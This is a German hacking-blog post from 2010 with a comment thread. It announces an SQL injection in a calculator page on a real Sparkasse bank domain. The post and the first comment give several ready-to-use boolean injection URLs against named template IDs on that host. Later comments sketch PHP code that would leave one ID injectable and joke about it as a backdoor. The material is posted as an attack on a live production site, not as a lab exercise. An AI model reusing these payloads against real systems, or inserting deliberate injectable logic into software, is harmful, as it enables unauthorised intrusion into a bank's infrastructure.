Home > SQL Injections > [SQLi] Sparkasse.de – Rechner

[SQLi] Sparkasse.de – Rechner

http://rechner.sparkasse.de/katalog/index.php?a=overview&template=72+and+1=2--+

Player SQL Injections

  1. M0pp31!70
    4. Januar 2010, 10:55 | #1

    ist auf jedem umrechner möglich:

    1
    2
    3
    4
    
    http://rechner.sparkasse.de/katalog/index.php?a=overview&template=73+and+1=1++
    http://rechner.sparkasse.de/katalog/index.php?a=overview&template=48+and+1=1++
    http://rechner.sparkasse.de/katalog/index.php?a=overview&template=75+and+1=1++
    http://rechner.sparkasse.de/katalog/index.php?a=overview&template=72+and+1=1++

    usw…

  2. Player
    4. Januar 2010, 11:55 | #2

    Das kann gut möglich sein…

  3. evilkeks
    7. Januar 2010, 07:23 | #3

    Das ist wohl klar das jeder Umrechner Vuln ist. Das müsste vorallem der ersteller des Beitrages wissen.

  4. Player
    7. Januar 2010, 19:19 | #4

    Das ist mir schon klar, doch wenn sich jemand damit beschäftigt und durch probieren eigene Erfahrung macht, freut mich das und ich muss Ihn ja seinen Erfolg nicht gleich wieder nehmen ;)

  5. M0pp31!70
    13. Januar 2010, 22:23 | #5

    @evilkeks: so klar ist das nicht, wenn Player nur den unrechner mit id=72 erwähnt. Könnte ja sein da nur da im script ein Fehler ist!

  6. ?!?
    14. Januar 2010, 08:38 | #6

    @M0pp31!70
    Und wie sieht dann der Code aus?

    if($_GET['template']==72){
    $template=$_GET['template'];
    }
    else{
    $template=intval($_GET['template']);
    }

    xD

  7. Player
    15. Januar 2010, 00:07 | #7

    Das wäre doch mal eine Idee für eine Backdoor ;)

  8. M0pp31!70
    16. Januar 2010, 17:20 | #8

    @?!? so in etwa ^^ ;)
    ich hätte da aber eher an einen Fehler in dem script der Datenbank mit 72 gedacht!

  9. ?!? aka modakabam
    19. Januar 2010, 11:13 | #9

    @M0pp31!70
    Und wie soll dann der Code aussehen?